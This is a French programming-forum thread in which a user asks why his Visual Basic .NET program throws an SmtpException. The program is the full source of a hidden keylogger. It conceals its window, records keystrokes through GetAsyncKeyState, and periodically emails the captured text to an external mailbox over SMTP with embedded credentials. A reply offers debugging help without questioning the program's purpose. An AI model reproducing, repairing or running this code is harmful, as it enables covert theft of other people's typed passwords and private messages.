Partage
  • Partager sur Facebook
  • Partager sur Twitter

Probleme de Compiler

    10 novembre 2017 à 14:46:01

    Bonjour a tous, 


    je me suis servis du code ci-dessous et il fonctionnait jusqu'à ce que je modifie un peu le code et il à beugué. 
    j'ai donc remis le code d'origine voir ci-dessous mais cela ne veut pas refonctionné ! 
    Aurrais-je fais une erreur dans le code ? (je suis sous visual basic express 2010) 

    le message d'erreur est : 
    Une exception de première chance de type 'System.Net.Mail.SmtpException' s'est produite dans System.dll 

    Voici Le Code Source :

    Option Strict On
    Imports System.Net.Mail
    Public Class Form1
        Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
        Private Sub tmrEmail_Tick(sender As Object, e As EventArgs) Handles tmrEmail.Tick
            Try
                Dim smtpserver As New SmtpClient
                smtpserver.EnableSsl = True
                Dim mail As New MailMessage
                smtpserver.Credentials = New Net.NetworkCredential("amine2014max@gmail.com", "XXXX")
                smtpserver.Port = 587
                smtpserver.Host = "smtp.live.com"
                mail = New MailMessage
                mail.From = New MailAddress("amine2014max@gmail.com")
                mail.To.Add("amine2014max@gmail.com")
                mail.Subject = ("New keylogger logs!")
                mail.Body = txtLogs.Text
                smtpserver.Send(mail)
            Catch ex As Exception
                Me.Close()
            End Try
        End Sub
     
        Private Sub tmrKeys_Tick(sender As Object, e As EventArgs) Handles tmrKeys.Tick
            Dim result As Integer
            Dim key As String
            Dim i As Integer
     
            For i = 2 To 90
                result = 0
                result = GetAsyncKeyState(i)
                If result = -32767 Then
                    key = Chr(i)
                    If i = 13 Then key = vbNewLine
                    Exit For
                End If
            Next i
     
            If key <> Nothing Then
                If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
                    txtLogs.Text &= key
                Else
                    txtLogs.Text &= key.ToLower
                End If
            End If
     
            If My.Computer.Keyboard.AltKeyDown AndAlso My.Computer.Keyboard.CtrlKeyDown AndAlso key = "H" Then
                Me.Visible = True
            End If
        End Sub
     
        Private Sub Form1_FormClosed(sender As Object, e As FormClosedEventArgs) Handles Me.FormClosed
            txtLogs.Text &= vbNewLine & "Keylogger stopped at: " & Now & vbNewLine
        End Sub
     
        Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
            Me.ShowInTaskbar = False
            Me.ShowIcon = False
            Me.Visible = False
            txtLogs.Text = "keylogger started at: " & Now & vbNewLine
     
     
        End Sub
     
        Private Sub TextBox1_TextChanged(sender As System.Object, e As System.EventArgs) Handles txtLogs.TextChanged, TextLog1.TextChanged
     
        End Sub
    End Class

    Merci de votre précieuse aide.

    -
    Edité par Amine Max 10 novembre 2017 à 14:48:00

    • Partager sur Facebook
    • Partager sur Twitter
      11 novembre 2017 à 16:16:40

      Salut,

      pourrais-tu afficher l"erreur que le bloc try-catch récupère. Tu changes la ligne 20 par MsgBox(ex) . Le message d'erreur sera plus clair, et on pourra se baser dessus.

      • Partager sur Facebook
      • Partager sur Twitter

      Le meilleur moyen de prédire l'avenir, c'est de l'inventer | N'oubliez pas [résolu] et +1 | Excusez mon ôrtograffe, j'essaie de l'améliorer...

      Probleme de Compiler

      × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
      × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
      • Editeur
      • Markdown